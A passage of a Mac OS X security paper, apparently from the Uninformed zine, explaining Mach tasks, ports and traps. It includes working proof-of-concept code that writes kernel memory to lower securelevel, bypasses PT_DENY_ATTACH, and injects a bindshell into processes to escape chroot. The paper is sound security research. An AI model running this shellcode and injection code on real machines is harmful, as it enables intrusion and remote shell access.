used to supplement the limited ptrace functionality included in Mac OS X. + +Hello reader. I am writing this paper for two reasons. The first reason is to provide +some documentation on the Mach side of Mac OS X for people who are unfamiliar +with this and interested in looking into it. The second reason is to document my own +research, as I am fairly inexperienced with Mach programming. Because of this +fact, this paper may contain errors. If this is the case, please email me at +nemo@felinemenace.org and I will try to correct it. + + +2) Introduction + +This paper will try to provide a basic introduction to the Mach kernel +including its history and general design. From there, details will be +provided about how these concepts are implemented on Mac OS X. Finally, +this paper will illustrate some of the security concerns which arise +when trying to mix UNIX and Mach together. In this vein, I came across +an interesting quote from the Apple(.com) website [2]. + +``You can send messages to this port to start and stop the task, kill the task, +manipulate the tasks address space, and so forth. Therefore, whoever owns +a send right for a tasks port effectively owns the task and can manipulate +the tasks state without regard to BSD security policies or any higher-level +security policies.'' + +``In other words, an expert in Mach programming with local administrator access +to a Mac OS X machine can bypass BSD and higher-level security features.'' + +Sounds like a valid model on which to build a server platform to me... + + +3) History of Mach + +The Mach kernel began its life at the Carnegie Mellon University (CMU) [1] +and was originally based off an operating system named ``Accent''. 
+It was initially built inside the 4.2BSD kernel. As each of the Mach
+components was written, the equivalent BSD component was removed and
+replaced. Because of this fact, early versions of Mach were monolithic
+kernels, similar to xnu, with BSD code and Mach combined.
+
+Mach was predominantly designed around the need for multi-processor
+support. It was also designed as a micro-kernel; however, xnu, the
+implementation used by Mac OS X, is not a micro-kernel. This is due to
+the fact that the BSD code, as well as other subsystems, is included in
+the kernel.
+
+
+4) Basic Concepts
+
+This section will run over some of the high level concepts associated
+with Mach. These concepts have been documented repeatedly by various
+people who are vastly more talented at writing than I am. For that
+reason, I advise you to follow some of the links provided in the
+references section of this paper.
+
+Mach uses various abstractions to represent the components of the
+system. These abstractions can be confusing for someone with a UNIX
+background, so I'll define them now.
+
+
+4.1) Tasks
+
+A task is a logical representation of an execution environment. Tasks
+are used in order to divide system resources between each running
+program. Each task has its own virtual address space and privilege
+level. Each task contains one or more threads. The task's address
+space and resources are shared between each of its threads.
+
+On Mac OS X, new tasks can be created using either the task_create()
+function or the fork() BSD syscall.
+
+
+4.2) Threads
+
+In Mach, a thread is an independent execution entity. Each thread has
+its own registers and scheduling policies. Each thread also has access
+to all of the elements within the task that contains it.
+
+On Mac OS X, a list of all the threads in a task can be obtained using
+the task_threads() function shown below.
+
+    kern_return_t task_threads
+        (task_t task,
+         thread_act_port_array_t *thread_list,
+         mach_msg_type_number_t *thread_count);
+
+The Mach API on Mac OS X provides a variety of functions for dealing
+with threads. Through this API, new threads can easily be created,
+register contents can be modified and retrieved, and so on.
+
+
+4.3) Msgs
+
+Messages are used in Mach in order to provide communication between
+threads. A message is made up of a collection of data objects. Once a
+message is created, it is sent to a port for which the invoking task
+has the appropriate port rights. Port rights can be sent between tasks
+as a message. Messages are queued at the destination and processed at
+the liberty of the receiving thread.
+
+On Mac OS X, the mach_msg() function can be used to send and receive
+messages to and from a port. The declaration for this function is shown
+below.
+
+    mach_msg_return_t mach_msg
+        (mach_msg_header_t *msg,
+         mach_msg_option_t option,
+         mach_msg_size_t send_size,
+         mach_msg_size_t receive_limit,
+         mach_port_t receive_name,
+         mach_msg_timeout_t timeout,
+         mach_port_t notify);
+
+
+4.4) Ports
+
+A port is a kernel-controlled communication channel. It provides the
+ability to pass messages between threads. A thread with the appropriate
+port rights for a port is able to send messages to it. Multiple tasks
+which hold the appropriate port rights are able to send messages to a
+single port concurrently. However, only a single task may receive
+messages from a single port at any given time. Each port has an
+associated message queue.
+
+
+4.5) Port Set
+
+A port set is (unsurprisingly) a collection of Mach ports.
Each of the +ports in a port set use the same queue of messages. + + +5) Mach Traps (system calls) + +In order to combine Mach and BSD into one kernel (xnu), syscall numbers +are divided into different tables. On a PowerPC system, when the ``sc'' +instruction is executed, the syscall number is stored in r0 and used to +determine which syscall to execute. Positive syscall numbers (smaller +than 0x6000) are treated as FreeBSD syscalls. In this case the sysent +table is offset and the appropriate function pointer is used. + +In cases where the syscall number is greater than 0x6000, PPC specific +syscalls are used and the ``PPCcalls'' table is offset. However, in the +case of a negative syscall number, the mach_trap_table is indexed and +used. + +The code below is taken from the xnu source and shows this process. + + oris r15,r15,SAVsyscall >> 16 ; Mark that it this is a + ; syscall + + cmplwi r10,0x6000 ; Is it the special ppc-only + ; guy? + stw r15,SAVflags(r30) ; Save syscall marker + beq-- cr6,exitFromVM ; It is time to exit from + ; alternate context... + + beq-- ppcscall ; Call the ppc-only system + ; call handler... + + mr. r0,r0 ; What kind is it? + mtmsr r11 ; Enable interruptions + + blt-- .L_kernel_syscall ; System call number if + ; negative, this is a mach call... + + lwz r8,ACT_TASK(r13) ; Get our task + cmpwi cr0,r0,0x7FFA ; Special blue box call? + beq-- .L_notify_interrupt_syscall ; Yeah, call it... + + +On an Intel system, things are a little different. The ``int 0x81'' (cd +81) instruction is used to call Mach traps. The ``sysenter'' instruction +is used for the BSD syscalls. However, the syscall number convention +remains the same. The eax register is used to store the syscall number +in either case. + + +It seems that most people developing shellcode on Mac OS X stick to +using the FreeBSD syscalls. This may be due to lack of familiarity with +Mach traps, so hopefully this paper is useful in re-mediating that. I +have extracted a list of the Mach traps in the mach_trap_table from the +xnu kernel. (792.6.22). + + +5.1) List of mach traps in xnu-792.6.22 + +/* 26 */ mach_reply_port +/* 27 */ thread_self_trap +/* 28 */ task_self_trap +/* 29 */ host_self_trap +/* 31 */ mach_msg_trap +/* 32 */ mach_msg_overwrite_trap +/* 33 */ semaphore_signal_trap +/* 34 */ semaphore_signal_all_trap +/* 35 */ semaphore_signal_thread_trap +/* 36 */ semaphore_wait_trap +/* 37 */ semaphore_wait_signal_trap +/* 38 */ semaphore_timedwait_trap +/* 39 */ semaphore_timedwait_signal_trap +/* 41 */ init_process +/* 43 */ map_fd +/* 45 */ task_for_pid +/* 46 */ pid_for_task +/* 48 */ macx_swapon +/* 49 */ macx_swapoff +/* 51 */ macx_triggers +/* 52 */ macx_backing_store_suspend +/* 53 */ macx_backing_store_recovery +/* 59 */ swtch_pri +/* 60 */ swtch +/* 61 */ thread_switch +/* 62 */ clock_sleep_trap +/* 89 */ mach_timebase_info_trap +/* 90 */ mach_wait_until_trap +/* 91 */ mk_timer_create_trap +/* 92 */ mk_timer_destroy_trap +/* 93 */ mk_timer_arm_trap +/* 94 */ mk_timer_cancel_trap +/* 95 */ mk_timebase_info_trap +/* 100 */ iokit_user_client_trap + +When executing one of these traps the number on the left hand side +(multiplied by -1) must be placed into the eax register. (intel) Each of +the arguments must be pushed to the stack in reverse order. Although I +could go into a low level description of how to send a mach msg here, +the paper in the references has already done this and the author is a +lot better at it than me. 
I strongly suggest reading this paper if you +are at all interested in the subject matter. + + +6) MIG + +Due to the fact that Mach was designed as a micro-kernel and designed to +function across multiple processors and machines, a large portion of the +functionality is implemented by sending messages between tasks. In +order to facilitate this process, IPC interfaces must be defined to +provide the added functionality. + +To achieve this, Mach (and Apple) use a language called "Mach Interface +Generator" (MIG). MIG is a subset of the Matchmaker language, which +generates C or C++ interfaces for sending messages between tasks. + +When using MIG, files with the extension ".defs" are written containing +a description of the interface. These files are compiled into a .c/.cpp +file and a .h header file. This is done using the /usr/bin/mig tool on +Mac OS X. These generated files contain the appropriate C or C++ stub +code in order to handle the messages defined in the defs file. + +This can be confusing for someone from a UNIX or Windows background who +is new to Mach/Mac OS X. Many of the Mach functions discussed in this paper +are actually implemented as a .defs file. These files are shipped with the +xnu source (which is no longer available). + +An example from one of these files (osfmk/mach/mach_vm.defs) showing the +definition of the vm_allocate() function is provided below. + +/* + * Allocate zero-filled memory in the address space + * of the target task, either at the specified address, + * or wherever space can be found (controlled by flags), + * of the specified size. The address at which the + * allocation actually took place is returned. + */ +#if !defined(_MACH_VM_PUBLISH_AS_LOCAL_) +routine mach_vm_allocate( +#else +routine vm_allocate( +#endif + target : vm_task_entry_t; + inout address : mach_vm_address_t; + size : mach_vm_size_t; + flags : int); + + +It's useful to compile these .defs files with the /usr/bin/mig tool +and then read the generated c code to work out what should be done +when writing shellcode with the mach_msg mach trap. + +For more information on MIG check out [6]. Also, Richard Draves +did a talk on MIG, his slides are available from [7]. + + +7) Replacing ptrace() + +A lot of people seem to move to Mac OS X from a Linux or BSD background +and therefore expect the ptrace() syscall to be useful. However, +unfortunately, this isn't the case on Mac OSX. For some ungodly reason, +Apple decided to leave ptrace() incomplete and unable to do much more +than take a feeble attempt at an anti-debug mechanism or single step the +process. + +As it turns out, the anti-debug mechanism (PT_DENY_ATTACH) only stops +future ptrace() calls from attaching to the process. Since ptrace() +functionality is highly limited on Mac OS X anyway, and task_for_pid() is +unrestricted, this basically has no purpose. + +In this section I will run through the missing features from a /real/ +implementation of ptrace and show you how to implement them on Mac OS X. + +The first and most useful thing we'll look at is how to get a port for +a task. Assuming you have sufficient privileges to do so, you can call +the task_for_pid() function providing a unix process id and you will +receive a port for that task. + +This function is pretty straightforward to use and works as you'd expect. + + pid_t pid; + task_t port; + + task_for_pid(mach_task_self(), pid, &port); + + +After this call, if sufficient privileges were held, a port will be +returned in ``port''. 
This can then be used with later API function calls in order to
+manipulate the target task's resources. This is pretty similar
+conceptually to the ptrace() PTRACE_ATTACH functionality.
+
+One of the most noticeable changes to ptrace() on Mac OS X is the fact
+that it is no longer possible to retrieve register state as you would
+expect. Typically, the ptrace() commands PTRACE_GETREGS and
+PTRACE_GETFPREGS would be used to get register contents. Fortunately,
+this can be achieved quite easily using the Mach API.
+
+The task_threads() function can be used with a port in order to get a
+list of the threads in the task.
+
+    thread_act_port_array_t thread_list;
+    mach_msg_type_number_t thread_count;
+
+    task_threads(port, &thread_list, &thread_count);
+
+Once you have a list of threads, you can then loop over them and
+retrieve register contents from each. This can be done using the
+thread_get_state() function.
+
+The code below shows the process involved in retrieving the register
+contents from a thread (in this case the first thread) of a
+thread_act_port_array_t list.
+
+NOTE:
+    This code will only work on ppc machines; the i386_thread_state_t
+    type is used for intel.
+
+    ppc_thread_state_t ppc_state;
+    mach_msg_type_number_t sc = PPC_THREAD_STATE_COUNT;
+    long thread = 0; // for first thread
+
+    thread_get_state(
+        thread_list[thread],
+        PPC_THREAD_STATE,
+        (thread_state_t)&ppc_state,
+        &sc
+    );
+
+For PPC machines, you can then print out the contents of a desired
+register like so:
+
+    printf(" lr: 0x%x\n",ppc_state.lr);
+
+Now that register contents can be retrieved, we'll look at changing
+them and updating the thread to use our new contents.
+
+This is similar to the ptrace PTRACE_SETREGS and PTRACE_SETFPREGS
+requests on Linux. We can use the Mach call thread_set_state() to do
+this. I have written some code to put these concepts together into a
+tiny sample program.
+
+The following small assembly code will continue to loop until the r3
+register is nonzero.
+
+    .globl _main
+    _main:
+
+        li r3,0
+    up:
+        cmpwi cr7,r3,0
+        beq- cr7,up
+        trap
+
+The C code below attaches to the process and modifies the value of the
+r3 register to 0xdeadbeef.
+
+/*
+ * This sample code retrieves the old value of the
+ * r3 register and sets it to 0xdeadbeef.
+ *
+ * - nemo
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <mach/mach.h>
+#include <mach/mach_traps.h>
+#include <mach/thread_status.h>
+
+void error(char *msg)
+{
+    printf("[!] error: %s.\n",msg);
+    exit(1);
+}
+
+int main(int ac, char **av)
+{
+    ppc_thread_state_t ppc_state;
+    mach_msg_type_number_t sc = PPC_THREAD_STATE_COUNT;
+    long thread = 0; // for first thread
+    thread_act_port_array_t thread_list;
+    mach_msg_type_number_t thread_count;
+    task_t port;
+    pid_t pid;
+
+    if(ac != 2) {
+        printf("usage: %s <pid>\n",av[0]);
+        exit(1);
+    }
+
+    pid = atoi(av[1]);
+
+    if(task_for_pid(mach_task_self(), pid, &port))
+        error("cannot get port");
+
+    // better shut down the task while we do this.
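+    // (task_suspend() halts every thread in the target task, so the
+    //  register state read below cannot change underneath us until the
+    //  matching task_resume() call at the end.)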
+    if(task_suspend(port)) error("suspending the task");
+
+    if(task_threads(port, &thread_list, &thread_count))
+        error("cannot get list of tasks");
+
+    if(thread_get_state(
+        thread_list[thread],
+        PPC_THREAD_STATE,
+        (thread_state_t)&ppc_state,
+        &sc
+    )) error("getting state from thread");
+
+    printf("old r3: 0x%x\n",ppc_state.r3);
+
+    ppc_state.r3 = 0xdeadbeef;
+
+    if(thread_set_state(
+        thread_list[thread],
+        PPC_THREAD_STATE,
+        (thread_state_t)&ppc_state,
+        sc
+    )) error("setting state");
+
+    if(task_resume(port)) error("cannot resume the task");
+
+    return 0;
+}
+
+A sample run of these two programs is as follows:
+
+    -[nemo@gir:~/code]$ ./tst&
+    [1] 5302
+    -[nemo@gir:~/code]$ gcc chgr3.c -o chgr3
+    -[nemo@gir:~/code]$ ./chgr3 5302
+    old r3: 0x0
+    -[nemo@gir:~/code]$
+    [1]+  Trace/BPT trap          ./tst
+
+As you can see, when the C code is run, ./tst has its r3 register
+modified and the loop exits, hitting the trap.
+
+Another feature which has been removed from the ptrace() call on Mac OS
+X is the ability to read and write memory. Again, we can achieve this
+functionality using Mach API calls. The functions vm_write() and
+vm_read() (as expected) can be used to write and read the address space
+of a target task.
+
+These calls work pretty much how you would expect, and there are
+examples throughout the rest of this paper which use them. The
+functions are defined as follows:
+
+kern_return_t vm_read
+    (vm_task_t target_task,
+     vm_address_t address,
+     vm_size_t size,
+     vm_offset_t *data_out,
+     mach_msg_type_number_t *data_count);
+
+
+kern_return_t vm_write
+    (vm_task_t target_task,
+     vm_address_t address,
+     pointer_t data,
+     mach_msg_type_number_t data_count);
+
+
+These functions provide similar functionality to the ptrace requests:
+PTRACE_POKETEXT, PTRACE_POKEDATA and PTRACE_POKEUSR.
+
+The memory being read/written must have the appropriate protection in
+order for these functions to work correctly. However, it is quite easy
+to set the protection attributes for the memory before the read or
+write takes place. To do this, the vm_protect() API call can be used.
+
+kern_return_t vm_protect
+    (vm_task_t target_task,
+     vm_address_t address,
+     vm_size_t size,
+     boolean_t set_maximum,
+     vm_prot_t new_protection);
+
+The ptrace() syscall on Linux also provides a way to step a process up
+to the point where a syscall is executed. The PTRACE_SYSCALL request is
+used for this. This functionality is useful for applications such as
+"strace" to be able to keep track of system calls made by an
+application. Unfortunately, this feature does not exist on Mac OS X.
+The Mach API defines a function which would provide this functionality.
+
+kern_return_t task_set_emulation
+    (task_t task,
+     vm_address_t routine_entry_pt,
+     int syscall_number);
+
+This function would allow you to set up a userspace handler for a
+syscall and log its execution. However, this function has not been
+implemented on Mac OS X.
+
+
+8) Code injection
+
+The concept of using the Mach API in order to inject code into another
+task has been demonstrated numerous times. The most well-known
+implementation is named mach_inject. This code uses task_for_pid() to
+get a port for the chosen pid. The thread_create_running() function is
+used to create a thread in the task and set the register state. In
+this way, control of execution is gained. This code has been rewritten
+using the same method for the intel platform.
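+
+As a rough illustration of what the intel rewrite involves, the
+fragment below sketches the thread creation step using i386 thread
+state. It is a hypothetical sketch of the general method, not the
+mach_inject code itself: the 10.4-era field names (eip, esp) are
+assumed, and "entry" and "stack_top" are assumed to have already been
+prepared in the target with vm_allocate() and vm_write().
+
+#include <string.h>
+#include <mach/mach.h>
+#include <mach/thread_status.h>
+
+// Create a running thread in a target task on intel. The entry point
+// and stack must already exist in the target's address space.
+kern_return_t inject_x86(task_t task, vm_address_t entry,
+                         vm_address_t stack_top)
+{
+    i386_thread_state_t state;
+    thread_act_t thread;
+
+    memset(&state, 0, sizeof(state));
+    state.eip = entry;      // where the new thread begins executing
+    state.esp = stack_top;  // top of the stack prepared in the target
+
+    return thread_create_running(task, i386_THREAD_STATE,
+                                 (thread_state_t)&state,
+                                 i386_THREAD_STATE_COUNT, &thread);
+}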
+ +It's also pretty easy to set the thread starting state to point to the +dlopen() function and load a dylib from disk. Or even vm_map() an object +file into the process space by hand and fix up relocations yourself. + + +9) Moving into the kernel + +Since Mac OS X 10.4.6 on intel systems (the latest release of Mac OSX at +the time of writing this paper) both /dev/kmem and /dev/mem have been +removed. Because of this fact, a new method for entering and +manipulating the kernel memory is needed. + +Luckily, Mach provides a solution. By using the task_for_pid() mach trap +and passing in pid=0 the kernel machportt port is available. Obviously, +root privileges are required in order to do so. + +Once this port is acquired, you are able to read and write directly to +the kernel memory using the vm_read() and vm_write() functions. You can +also vm_map() or vm_remap() files and mappings directly into kernel +memory. + +I am using this functionality for a new version of the WeaponX rootkit, +but there are plenty other reasons why this is useful. + + +10) Security considerations of a UNIX / Mach hybrid + +Many problems arise when both UNIX and Mach aspects are provided on the +same system. As the quote from the Apple Security page says (mentioned +in the introduction). A good Mach programmer will be able to bypass high +level BSD security functionality by using the Mach API/Mach Traps on Mac +OS X. + +In this section I will run through a couple of examples of situations +where BSD security can be bypassed. There are many more cases like this. +I'll leave it up to you (the reader) to find more. + +The first bypass which we will look at is the "kern.securelevel" sysctl. +This sysctl is used to restrict various functionality from the root +user. When this sysctl is set to -1, the restrictions are non-existent. +Under normal circumstances the root user should be able to raise the +securelevel however lowering the securelevel should be restricted. + +Here is a demonstration of this: + + -[root@fry:~]$ id + uid=0(root) gid=0(wheel) + + -[root@fry:~]$ sysctl -a | grep securelevel + kern.securelevel = 1 + + -[root@fry:~]$ sysctl -w kern.securelevel=-1 + kern.securelevel: Operation not permitted + + -[root@fry:~]$ sysctl -w kern.securelevel=2 + kern.securelevel: 1 -> 2 + + -[root@fry:~]$ sysctl -w kern.securelevel=1 + kern.securelevel: Operation not permitted + +As you can see, modification of this sysctl works as described above. +However! Due to the fact that we can task_for_pid() pid=0 and write to +kernel memory, we can bypass this. + +In order to do this, we simply get the address of the variable in +kernel- space which stores the securelevel. To do this we can use the +`nm' tool. + + -[root@fry:~]$ nm /mach_kernel | grep securelevel + 004bcf00 S _securelevel + +We can then use this value by calling task_for_pid() to get the kernel +task port, and calling vm_write() to write to this address. The code +below does this. + +Here is an example of this code being used. + + -[root@fry:~]$ sysctl -a | grep securelevel + kern.securelevel = 1 + + -[root@fry:~]$ ./slevel -1 + [+] done! + + -[root@fry:~]$ sysctl -a | grep securelevel + kern.securelevel = -1 + +A kext could also be used for this. But this is neater and relevant. + +/* + * [ slevel.c ] + * nemo@felinemenace.org + * 2006 + * + * Tools to set the securelevel on + * Mac OSX Build 8I1119 (10.4.6 intel). 
+ */ + + +#include +#include +#include +#include + +// -[nemo@fry:~]$ nm /mach_kernel | grep securelevel +// 004bcf00 S _securelevel +#define SECURELEVELADDR 0x004bcf00 + +void error(char *msg) +{ + printf("[!] error: %s\n",msg); + exit(1); +} + +void usage(char *progname) +{ + printf("[+] usage: %s \n",progname); + exit(1); +} + +int main(int ac, char **av) +{ + mach_port_t kernel_task; + kern_return_t err; + long value = 0; + + if(ac != 2) + usage(*av); + + if(getuid() && geteuid()) + error("requires root."); + + value = atoi(av[1]); + + err = task_for_pid(mach_task_self(),0,&kernel_task); + if ((err != KERN_SUCCESS) || !MACH_PORT_VALID(kernel_task)) + error("getting kernel task."); + + // Write values to stack. + if(vm_write(kernel_task, (vm_address_t) SECURELEVELADDR, (vm_address_t)&value, sizeof(value))) + error("writing argument to dlopen."); + + printf("[+] done!\n"); + return 0; +} + +The chroot() call is a UNIX mechanism which is often (mis)used for +security purposes. This can also be bypassed using the Mach +API/functionality. A process running on Mac OSX within a chroot() is +able to attach to any process outside using the task_for_pid() Mach +trap. Although neither of these problems are significant, they are an +indication of some of the ways that UNIX functionality can be bypassed +using the Mach API. + +The code below simply loops through all pids from 1 upwards and attempts +to inject a small code stub into a new thread. It is written for PowerPC +architecture. I have also included some shellcode for intel arch in case +anyone has the need to use it in these circumstances. + +/* + * sample code to break chroot() on osx + * - nemo + * + * This code is a PoC and by so, is pretty harsh + * I just trap in any process which isn't desirable. + * DO NOT RUN ON A PRODUCTION BOX (or if you do, email + * me the results so I can laugh at you) + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define STACK_SIZE 0x6000 +#define MAXPID 0x6000 + +char ppc_probe[] = +// stat code +"\x38\x00\x00\xbc\x7c\x24\x0b\x78\x38\x84\xff\x9c\x7c\xc6\x32" +"\x79\x40\x82\xff\xf1\x7c\x68\x02\xa6\x38\x63\x00\x18\x90\xc3" +"\x00\x0c\x44\x00\x00\x02\x7f\xe0\x00\x08\x48\x00\x00\x14" +"/mach_kernelAAAA" +// bindshell from metasploit. Port 4444 +"\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00" +"\x61\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00" +"\x00\x0d\x00\x02\x11\x5c\x00\x00\x00\x00\x7c\x88\x02\xa6\x38" +"\xa0\x00\x10\x38\x00\x00\x68\x7f\xc3\xf3\x78\x44\x00\x00\x02" +"\x7c\x00\x02\x78\x38\x00\x00\x6a\x7f\xc3\xf3\x78\x44\x00\x00" +"\x02\x7c\x00\x02\x78\x7f\xc3\xf3\x78\x38\x00\x00\x1e\x38\x80" +"\x00\x10\x90\x81\xff\xe8\x38\xa1\xff\xe8\x38\x81\xff\xf0\x44" +"\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x38\xa0\x00\x02" +"\x38\x00\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78\x44\x00\x00" +"\x02\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff\x40\x82" +"\xff\xe5\x38\x00\x00\x42\x44\x00\x00\x02\x7c\x00\x02\x78\x7c" +"\xa5\x2a\x79\x40\x82\xff\xfd\x7c\x68\x02\xa6\x38\x63\x00\x28" +"\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x00\x00" +"\x3b\x7c\x00\x04\xac\x44\x00\x00\x02\x7c\x00\x02\x78\x7f\xe0" +"\x00\x08\x2f\x62\x69\x6e\x2f\x63\x73\x68\x00\x00\x00\x00"; + +unsigned char x86_probe[] = +// stat code, cheq for /mach_kernel. Makes sure we're outside +// the chroot. 
+"\x31\xc0\x50\x68\x72\x6e\x65\x6c\x68\x68\x5f\x6b\x65\x68\x2f" +"\x6d\x61\x63\x89\xe3\x53\x53\xb0\xbc\x68\x7f\x00\x00\x00\xcd" +"\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80\x90\x90\x90\x90\x90" +// bindshell - 89 bytes - port 4444 +// based off metasploit freebsd code. +"\x6a\x42\x58\xcd\x80\x6a\x61\x58\x99\x52\x68\x10\x02\x11\x5c" +"\x89\xe1\x52\x42\x52\x42\x52\x6a\x10\xcd\x80\x99\x93\x51\x53" +"\x52\x6a\x68\x58\xcd\x80\xb0\x6a\xcd\x80\x52\x53\x52\xb0\x1e" +"\xcd\x80\x97\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51\xcd\x80\x49" +"\x0f\x89\xf1\xff\xff\xff\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62" +"\x69\x6e\x89\xe3\x50\x54\x54\x53\x53\xb0\x3b\xcd\x80"; + +int injectppc(pid_t pid,char *sc,unsigned int size) +{ + kern_return_t ret; + mach_port_t mytask; + vm_address_t stack; + ppc_thread_state_t ppc_state; + thread_act_t thread; + long blr = 0x7fe00008; + + if ((ret = task_for_pid(mach_task_self(), pid, &mytask))) + return -1; + + // Allocate room for stack and shellcode. + if(vm_allocate(mytask, &stack, STACK_SIZE, TRUE) != KERN_SUCCESS) + return -1; + + // Write in our shellcode + if(vm_write(mytask, (vm_address_t)((stack + 650)&~2), (vm_address_t)sc, size)) + return -1; + + if(vm_write(mytask, (vm_address_t) stack + 960, (vm_address_t)&blr, sizeof(blr))) + return -1; + + // Just in case. + if(vm_protect(mytask,(vm_address_t) stack, STACK_SIZE, +VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE,VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE)) + return -1; + + + memset(&ppc_state,0,sizeof(ppc_state)); + ppc_state.srr0 = ((stack + 650)&~2); + ppc_state.r1 = stack + STACK_SIZE - 100; + ppc_state.lr = stack + 960; // terrible blr cpu usage but this + // whole code is a hack so shutup!. + + if(thread_create_running(mytask, PPC_THREAD_STATE, + (thread_state_t)&ppc_state, PPC_THREAD_STATE_COUNT, &thread) + != KERN_SUCCESS) + return -1; + + return 0; +} + +int main(int ac, char **av) +{ + pid_t pid; + // (pid = 0) == kernel + printf("[+] Breaking chroot() check for a non-chroot()ed shell on port 4444 (TCP).\n"); + for(pid = 1; pid <= MAXPID ; pid++) + injectppc(pid,ppc_probe,sizeof(ppc_probe)); + + return 0; +} + +The output below shows a sample run of this code on a stock standard Mac +OSX 10.4.6 Mac mini. As you can see, a non privilege user within the +chroot() is able to attach to a process running at the same privilege +level outside of the chroot(). Some shellcode can then be injected into +the process to bind a shell. + + -[nemo@gir:~/code]$ gcc break.c -o break + -[nemo@gir:~/code]$ cp break chroot/ + -[nemo@gir:~/code]$ sudo chroot chroot/ + -[root@gir:/]$ ./dropprivs + +An interesting note about this little ./dropprivs program is that I had +to use seteuid()/setuid() separately rather than using the setreuid() +function. It appears setreuid() and setregid() don't actually work at +all. Andrewg summed this situation up nicely: + + best backdoor ever + + -[nemo@gir:/]$ ./break + [+] Breaking chroot() check for a non-chroot()ed shell on port 4444 (TCP). + -[nemo@gir:/]$ Illegal instruction + -[root@gir:/]$ nc localhost 4444 + ls -lsa /mach_kernel + 8472 -rw-r--r-- 1 root wheel 4334508 Mar 27 14:27 /mach_kernel + id; + uid=501(nemo) gid=501(nemo) groups=501(nemo) + +Another method of breaking out from a chroot() environment would be to +simply task_for_pid() pid 0 and write into kernel memory. However since +this would require root privileges I didn't bother to implement it. +This code could quite easily be implemented as shellcode. 
However, due to time constraints and lack of caring, I'll leave it up
to you to do so.

== ptrace

As I mentioned in the ptrace section of this paper, the ptrace()
syscall has been heavily bastardized and is pretty useless now.
However, a new ptrace command, PT_DENY_ATTACH, has been implemented to
enable a process to request that other processes not be able to ptrace
attach to it.

The following sample code shows the use of this:

    #include <sys/ptrace.h>
    #include <stdio.h>
    #include <stdlib.h>

    static int changeme = 0;

    int main(int ac, char **av)
    {
        ptrace(PT_DENY_ATTACH, 0, 0, 0);

        while(1) {
            if(changeme) {
                printf("[+] hacked.\n");
                exit(1);
            }
        }

        return 1;
    }

This code does nothing but sit and spin while checking the status of a
global variable which is never changed. As you can see below, if we try
to attach to this process in gdb (which uses ptrace) our process will
receive a SIGSEGV.

 (gdb) at hackme.25143
 A program is being debugged already. Kill it? (y or n) y
 Attaching to program: `/Users/nemo/hackme', process 25143.
 Segmentation fault

However, we can use the Mach API, as mentioned earlier, and still
attach to the process just fine. We can use the `nm' command in order
to get the address of the static changeme variable.

 -[nemo@fry:~]$ nm hackme | grep changeme
 0000202c b _changeme

Then, using the following code, we task_for_pid() the process and
modify the contents of this variable (as an example).

    #include <stdio.h>
    #include <stdlib.h>
    #include <mach/mach.h>
    #include <mach/mach_types.h>
    #include <mach/mach_init.h>
    #include <mach/mach_traps.h>
    #include <mach/vm_map.h>

    #define CHANGEMEADDR 0x202c

    void error(char *msg)
    {
        printf("[!] error: %s\n",msg);
        exit(1);
    }

    int main(int ac, char **av)
    {
        mach_port_t port;
        long content = 1;

        if(ac != 2) {
            printf("[+] usage: %s <pid>\n",av[0]);
            exit(1);
        }

        if(task_for_pid(mach_task_self(), atoi(av[1]), &port))
            error("_|_");

        if(vm_write(port, (vm_address_t) CHANGEMEADDR,
                    (vm_address_t)&content, sizeof(content)))
            error("writing to process");

        return 0;
    }

As you can see below, this will result in the loop terminating as
expected.

 -[nemo@fry:~]$ ./hackme
 [+] hacked.
 -[nemo@fry:~]$


11) Conclusion

Well, you actually read all the way to the bottom of this paper! Hope
it wasn't too boring. Things are changing a little on Mac OS X. The
later releases (10.4.6) on Intel have new restrictions in place on the
task_for_pid() function. These restrictions require you to be part of
the "procmod" group or root in order to call the task_for_pid() Mach
trap. Luckily these restrictions are easily bypassable.

There is also mixed discussion (gossip) about whether or not Mach will
be completely removed from Mac OS X in the future. I have no idea how
true (or not) this is though.

If you noticed any problems with the content, as I mentioned earlier,
please email me at nemo@felinemenace.org and let me know. No pointless
(unconstructive) criticism please though.

Thanks to everyone at felinemenace and pulltheplug for your ongoing
support and friendship. Also thanks to anyone who proofread this paper
for me and to the uninformed team for giving me the opportunity to
publish this.

Bibliography


[1] CMU. The Mach Project.
 http://www.cs.cmu.edu/afs/cs/project/mach/public/www/mach.html

[2] Apple. Apple Security Overview.
 http://developer.apple.com/documentation/Security/Conceptual/Security_Overview/Concepts/chapter_3_section_9.html

[3] Mach. Mach Man-pages.
 http://felinemenace.org/~nemo/mach/manpages

[4] Rentzsch. Mach Inject.
+ http://rentzsch.com/mach_inject/ + +[5] Guiheneuf. Mach Inject. + http://guiheneuf.org/Site/mach + +[6] Richard P. Draves/Michael B. Jones and Mary R. Thompson. Mach Interface Generator. + http://felinemenace.org/ nemo/mach/mig.txt + +[7] Richard P. Draves. MIG Slides. + http://felinemenace.org/ nemo/mach/Slides + +[8] Wikipedia. Mach Kernel. + http://en.wikipedia.org/wiki/Mach_kernel + +[9] Feline Menace. The Mach System. + http://felinemenace.org/ nemo/mach/Mach.txt + +[10] OSX Code. Mach. + http://www.osxcode.com/index.php?pagename=Articles&article=10 + +[11] CMU. A Programmer's Guide to the Mach System Calls. + http://www.cs.cmu.edu/afs/cs/project/mach/public/www/doc/abstracts/machsys.html + +[12] CMU. A Programmer's Guide to the Mach User Environment. + http://www.cs.cmu.edu/afs/cs/project/mach/public/www/doc/abstracts/machuse.html diff --git a/uninformed/4.7.txt b/uninformed/4.7.txt new file mode 100644 index 0000000..5d553b9 --- /dev/null +++ b/uninformed/4.7.txt @@ -0,0 +1,821 @@ +GREPEXEC: Grepping Executive Objects from Pool Memory +bugcheck +chris@bugcheck.org + +1) Foreword + +Abstract: + +As rootkits continue to 